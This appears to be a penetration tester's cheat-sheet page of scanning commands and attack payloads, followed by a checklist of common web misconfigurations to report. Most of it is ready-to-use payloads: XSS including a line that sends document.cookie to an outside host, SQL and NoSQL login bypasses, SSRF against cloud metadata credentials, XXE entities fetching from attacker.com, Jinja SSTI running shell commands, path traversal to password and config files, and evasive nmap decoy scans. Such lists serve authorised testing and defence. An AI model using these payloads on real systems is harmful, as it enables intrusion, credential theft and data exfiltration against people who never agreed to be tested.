Handy Commands & Payloads

Commands and Payloads that I use the most to get the basics covered.

Nmap

Initial Port Scan and Service Scan with Evasive Techniques:

nmap -f -D RND:10 -p- -Pn $TARGET

nmap -sC -sV -p $(nmap -f -D RND:10 -p- -Pn $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',') $TARGET

Other nmap scans:

sudo nmap -Pn -p 3389 -ff -send-eth -script rdp-enum-encryption $IP

Test SSL

testssl $URL

Nikto

nikto -host $URL
nikto -h $URL -O STATIC-COOKIE="Authorization: Bearer..."

Nuclei

nuclei -u $URL
nuclei -u $URL -H "cookie: "

# Use secrets.yaml file for other authentication mechanisms

Nuclei Fuzzer

nf -d $URL

Directory Fuzzing

  1. Gobuster:

    gobuster dir -u $URL -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 302,404 -o gobuster_dir.txt

  2. ffuf (Basic):

    ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -mc 200 -c -r -sf -t 20 -o ffuf_dir.csv -of csv

  3. Ffuf (API):

    ffuf -request api.req -w /opt/SecLists/Discovery/Web-Content/api/common-paths,actions-lowercase,/opt/SecLists/Fuzzing/special-chars.txt -request-proto http -mc 200 -c -r -sf -o fuff_api_dir.csv -of csv

VHOST Fuzzing

ffuf -H "Host: FUZZ.collect.htb" -u http://collect.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -c -r -sf -ac -o subd_ffuf.txt

SQLi

sqlmap -r app.req --level 5 --risk 3 --batch

XSS Best Payloads

<script>alert(1)</script>
<script src=//14.rs></script>
"><svg onload=alert()>
<embed src=//14.rs>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<a href=javascript:confirm()>click here

SQL Injection Payloads

' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /* 
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #

NoSQL Injection Payloads

{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}

SSRF Payloads

# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/

http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080

XXE Payloads

xmlCopy code<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>

SSTI Payloads

# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}

File Inclusion Payloads

../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf

CRLF Injection Payloads

GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n

POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

Easy Vulnerabilities & Security Misconfigurations to Report

Vulnerabilities that could be found in the early stages (first few hours) of a pentest.

Security Headers

  • Misconfigured Security Headers:

    • X-Frame-Options

    • X-XSS-Protection

    • X-Content-Type-Options

    • Strict-Transport-Security

    • Content-Security-Policy (CSP)

    • Referrer-Policy

Cross-Origin Resource Sharing (CORS)

  • Insecure CORS Configuration:

    • Allowing wildcard (*) origin

    • Allowing untrusted origins

    • Lack of proper validation

Cookie Attributes

  • Insecure Cookie Attributes:

    • Missing HttpOnly flag

    • Missing Secure flag

    • Missing SameSite attribute

Authentication & Session Management

  • Concurrent Logins Allowed:

    • Multiple sessions from different IPs

  • Improper Session Timeout:

    • Long or no session expiration

  • Improper Invalidation of Cookie Post Logout:

    • Session remains active after logout

  • Weak Password Policies:

    • No complexity requirements

    • Lack of rate limiting

File Handling

  • Unrestricted File Upload:

    • No file type validation

    • No file size restrictions

    • No scanning for malware

Access Controls

  • Staging Environment Accessible from External Network:

    • Exposed internal environments

  • Sensitive Directories Accessible:

    • /.git/, /.svn/, /backup/, /config/

Web Server Configuration

  • Clickjacking:

    • Missing X-Frame-Options header

  • Weak SSL Ciphers:

    • Use of deprecated SSL/TLS versions

    • Weak cipher suites enabled

  • Web Server Fingerprinting:

    • Banner Grabbing revealing server information

Information Disclosure

  • Verbose Error Messages:

    • Detailed stack traces

    • Application/Server details in error messages

  • Directory Listing Enabled:

    • Ability to list files in web directories

Business Logic & Other Issues

  • Lack of Rate Limiting:

    • Brute force or DoS vulnerabilities

  • No Account Lockout:

    • Unlimited login attempts

  • Weak Default Credentials:

    • Use of default passwords for admin accounts

  • HTTP Methods:

    • TRACE/TRACK methods enabled

  • Referrer Policy:

    • No Referrer Policy header

  • API Security:

    • Lack of authentication

    • Lack of rate limiting

    • Exposed sensitive endpoints

  • Insecure Direct Object References (IDOR):

    • Direct access to unauthorized resources

  • Lack of Input Validation:

    • No sanitization of user input

Additional Points

  • Backup Files Accessible:

    • .bak, .old, .save files accessible

  • Exposed API Keys or Tokens:

    • API keys or tokens in URLs, JavaScript, etc.

  • Insufficient Logging and Monitoring:

    • Lack of logging for security events

  • Cross-Site Request Forgery (CSRF):

    • Missing or incorrect CSRF tokens

  • Insufficient Transport Layer Security:

    • HTTP instead of HTTPS

  • Autocomplete Enabled for Sensitive Fields:

    • Sensitive form fields have autocomplete enabled

  • Insecure Directories:

    • /admin/, /config/, /backup/ directories exposed

  • Insecure Third-Party Integrations:

    • Unpatched or outdated third-party libraries and frameworks

PreviousCORS MisconfigurationNextActive Directory Pentest

Last updated